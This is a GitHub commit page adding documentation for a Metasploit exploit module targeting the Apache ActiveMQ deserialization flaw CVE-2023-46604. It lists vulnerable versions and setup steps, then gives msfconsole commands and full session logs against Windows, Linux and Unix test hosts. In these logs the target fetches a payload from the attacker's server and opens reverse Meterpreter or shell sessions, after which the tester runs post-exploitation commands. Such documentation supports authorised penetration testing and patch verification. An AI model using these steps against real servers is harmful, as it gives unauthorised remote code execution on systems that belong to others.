Skip to content

Commit

Permalink
Land #18501, Exploit module for CVE-2023-46604 - Apache ActiveMQ
Browse files Browse the repository at this point in the history 
Merge branch 'land-18501' into upstream-master
  • Loading branch information
@bwatters-r7
bwatters-r7 committed Nov 6, 2023
2 parents c06d491 + ea21036 commit e8d45b0
Show file tree
Hide file tree
Showing 2 changed files with 486 additions and 0 deletions.
287 changes: 287 additions & 0 deletions documentation/modules/exploit/multi/misc/apache_activemq_rce_cve_2023_46604.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,287 @@
## Vulnerable Application
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ.
Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all
versions before 5.15.16.

For a full technical analysis of the vulnerability read the
[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis).

## Testing

### Linux
* The official [Getting Started](https://activemq.apache.org/getting-started) documentation has a full walkthrough.
* You will need to install Java if you have not already done so.
* Download a vulnerable version of ActiveMQ, e.g. [apache-activemq-5.18.2-bin.tar.gz](https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.18.2/apache-activemq-5.18.2-bin.tar.gz&action=download)
* Extract the contents: `tar zxvf apache-activemq-5.18.2-bin.tar.gz`
* Change into the ActiveMQ directory: `cd apache-activemq-5.18.2/bin/`
* Run ActiveMQ in the foreground: `./activemq console`

## Verification Steps
Note: Disable Defender if you are using the default payloads on a Windows target.

Steps (Linux target):
1. Start msfconsole
2. `use exploit/multi/misc/apache_activemq_rce_cve_2023_46604`
3. `set RHOST <LINUX_TARGET_IP>`
4. `set SRVHOST eth0`
5. `set target 1`
6. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
7. `check`
8. `exploit`

## Scenarios

### Windows
```
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 61616 yes The target port (TCP)
SRVHOST 192.168.86.42 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (defau
lt is randomly generated)
URIPATH no The URI to use for this exploit (defaul
t is random)
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '',
seh, thread, process, none)
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Acc
epted: CURL, TFTP, CERTUTIL)
FETCH_DELETE false yes Attempt to delete the binary
after execution
FETCH_FILENAME ainzysikAU no Name to use on remote system
when storing payload; cannot
contain spaces.
FETCH_SRVHOST no Local IP to use for serving p
ayload
FETCH_SRVPORT 8080 yes Local port to use for serving
payload
FETCH_URIPATH no Local URI to use for serving
payload
FETCH_WRITABLE_DI %TEMP% yes Remote writable dir to store
R payload; cannot contain space
s.
LHOST 192.168.86.42 yes The listen address (an interf
ace may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/4ORmILKzvCrowHQ
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:51975) at 2023-11-02 10:15:14 +0000
meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\apache-activemq-5.15.3\bin
meterpreter > sysinfo
Computer : WIN-V28QNSO2H05
OS : Windows 2016+ (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```

### Linux

```
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 61616 yes The target port (TCP)
SRVHOST 192.168.86.42 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (defau
lt is randomly generated)
URIPATH no The URI to use for this exploit (defaul
t is random)
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Acc
epted: CURL, FTP, TFTP, TNFTP
, WGET)
FETCH_DELETE false yes Attempt to delete the binary
after execution
FETCH_FILENAME baCcDlijxJN no Name to use on remote system
when storing payload; cannot
contain spaces.
FETCH_SRVHOST no Local IP to use for serving p
ayload
FETCH_SRVPORT 8080 yes Local port to use for serving
payload
FETCH_URIPATH no Local URI to use for serving
payload
FETCH_WRITABLE_DI yes Remote writable dir to store
R payload; cannot contain space
s.
LHOST 192.168.86.42 yes The listen address (an interf
ace may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/Fn51CApi
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (3045380 bytes) to 192.168.86.43
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:44674) at 2023-11-02 10:17:42 +0000
meterpreter > getuid
Server username: steve
meterpreter > pwd
/home/steve/Downloads/apache-activemq-5.18.2/bin
meterpreter > sysinfo
Computer : 192.168.86.43
OS : Ubuntu 22.04 (Linux 6.2.0-33-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.86.43 - Meterpreter session 3 closed. Reason: Died
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) >
```

### Unix

```
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[
,type:host:port][...]
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 61616 yes The target port (TCP)
SRVHOST 192.168.86.42 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (defau
lt is randomly generated)
URIPATH no The URI to use for this exploit (defaul
t is random)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.86.42 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Unix
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/3mzi3Tfryin
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.43:48962) at 2023-11-02 10:20:13 +0000
id
[*] 192.168.86.43:61616 - Server stopped.
uid=1000(steve) gid=1000(steve) groups=1000(steve),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),139(wireshark)
pwd
/home/steve/Downloads/apache-activemq-5.18.2/bin
uname -a
Linux sfewer-ubuntu-test 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
exit
```
Loading

0 comments on commit e8d45b0

Please sign in to comment.